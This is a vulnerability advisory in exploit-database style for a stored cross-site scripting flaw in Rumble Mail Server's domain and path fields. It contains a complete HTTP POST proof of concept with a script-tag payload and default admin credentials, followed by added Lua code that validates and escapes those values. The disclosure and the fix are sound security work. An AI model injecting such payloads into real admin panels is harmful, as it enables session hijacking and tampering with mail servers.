# Exploit Title: Rumble Mail Server 0.51.3135 - 'domain and path' Stored XSS
# Date: 2020-9-3
# Exploit Author: Mohammed Alshehri
# Vendor Homepage: http://rumble.sf.net/
# Software Link: https://sourceforge.net/projects/rumble/files/Windows%20binaries/rumble_0.51.3135-setup.exe
# Version: Version 0.51.3135
# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763

# Info
The parameters `domain` and `path` are vulnerable to stored XSS.

# Exploit:

POST /domains HTTP/1.1
Host: 127.0.0.1:2580
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 119
Origin: http://127.0.0.1:2580
Authorization: Basic YWRtaW46YWRtaW4=
Connection: keep-alive
Referer: http://127.0.0.1:2580/domains?domain=%3Cscript%3Ealert(
Upgrade-Insecure-Requests: 1

domain=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&path=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&create=true

HTTP/1.1 200 OK
Connection: close
Content-Type: text/html

RumbleLua
RumbleLua on a
Rumble Mail Server v/0.51.3135
Server status Domains & accounts RumbleLua users Server settings Set up modules System logs Mail queue

Domains

Create a new domain
Domain has been created.
Domain name:
Optional alt. storage path:

Domain  Actions
 "> &delete=true">

Powered by Rumble Mail Server - [wiki] [project home]
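
One way to close both injection points, as an added example rather than code from the advisory or from the Rumble project: validate `domain` as a hostname on input, and encode `domain` and `path` for their output context when the list is rendered. It is written in Lua on the assumption that the RumbleLua pages are Lua scripts; the function names and the row markup (including the delete link, inferred from the `&delete=true">` fragment in the response) are hypothetical.

```lua
-- Added example: hypothetical helpers, not RumbleLua's own code.
local HTML_ENTITIES = {
  ["&"] = "&amp;", ["<"] = "&lt;", [">"] = "&gt;",
  ['"'] = "&quot;", ["'"] = "&#39;",
}

-- Encode a value for HTML text and quoted-attribute contexts.
local function html_escape(value)
  return (tostring(value):gsub("[&<>\"']", HTML_ENTITIES))
end

-- Percent-encode a value before placing it in a URL query string.
local function url_encode(value)
  return (tostring(value):gsub("[^A-Za-z0-9%-%._~]", function(c)
    return string.format("%%%02X", string.byte(c))
  end))
end

-- Input check: accept only dot-separated labels of letters, digits, hyphens.
local function is_valid_domain(name)
  if type(name) ~= "string" or #name == 0 or #name > 253 then return false end
  for label in (name .. "."):gmatch("([^.]*)%.") do
    if #label == 0 or #label > 63 then return false end
    if not label:match("^[A-Za-z0-9][A-Za-z0-9%-]*$") then return false end
    if label:sub(-1) == "-" then return false end
  end
  return true
end

-- Output: every stored value is encoded for the context it lands in.
-- The row layout and delete link are assumptions, not Rumble's markup.
local function render_domain_row(domain, path)
  local delete_url = "/domains?domain=" .. url_encode(domain) .. "&delete=true"
  return string.format(
    '<tr><td>%s</td><td>%s</td><td><a href="%s">Delete</a></td></tr>',
    html_escape(domain), html_escape(path or ""), html_escape(delete_url))
end

-- The value both parameters carry in the request above, URL-decoded.
local payload = '<script>alert("XSS")</script>'
print(is_valid_domain(payload))       -- input check on the submitted domain
print(is_valid_domain("example.org")) -- constructed benign name
print(render_domain_row("example.org", payload))
```

Input validation alone does not cover rows stored before the check existed, so the output encoding in `render_domain_row` has to be applied regardless of how the value was accepted.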